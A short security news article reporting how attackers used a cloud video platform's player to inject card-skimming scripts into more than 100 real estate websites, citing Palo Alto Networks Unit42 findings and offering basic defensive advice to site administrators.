Cloud Video Platform Used By Cybercriminals to Steal Payment Information
More than 100 Real Estate Websites Were Compromised.
Threat actors used an unnamed cloud video hosting service to inject malicious scripts into over 100 real estate websites owned by the same holding company. The goal of this supply chain attack was to steal private information contained in website forms.
These malicious scripts, also known as skimmers, are becoming increasingly popular and are often injected into compromised websites in order to steal sensitive data provided by users on the targeted website. Skimmers are frequently used on checkout pages for online stores to steal payment information.
How Does the Attack Work?
According to BleepingComputer, Palo Alto Networks Unit42 spotted a new chain attack in which hackers were exploiting a cloud video platform feature to inject skimmer code into a video player. The moment a website embeds that player, the malicious script is also embedded, compromising the site.
It appears that the supply chain attack was highly effective since more than 100 websites have been impacted by the operation, according to the cybersecurity company. The researchers alerted the cloud video provider and assisted the compromised websites in removing the malicious code.
Upon the next player update, the video platform started serving the skimmer code to every real estate website that already had the player embedded, enabling the script to gather confidential data entered into website forms.
What Kind of Data Was Accessed?
Following an extensive investigation, Unit42 discovered that the skimmer code was designed to identify credit card patterns, steal victim names, email addresses, phone numbers, financial information, and send them to the threat actors.
The skimmer itself is highly polymorphic, elusive, and continuously evolving. When combined with cloud distribution platforms, the impact of a skimmer of this type could be very large.
For website administrators, it is advisable to safeguard any accounts, avoid theft by phishing or social engineering, and manage permissions well. Also, we highly recommend conducting web content integrity checks on a regular basis. This can help detect and prevent injection of malicious code into the website content.
Palo Alto Networks has provided a complete list of the IoCs (indicators of compromise) on this GitHub repository.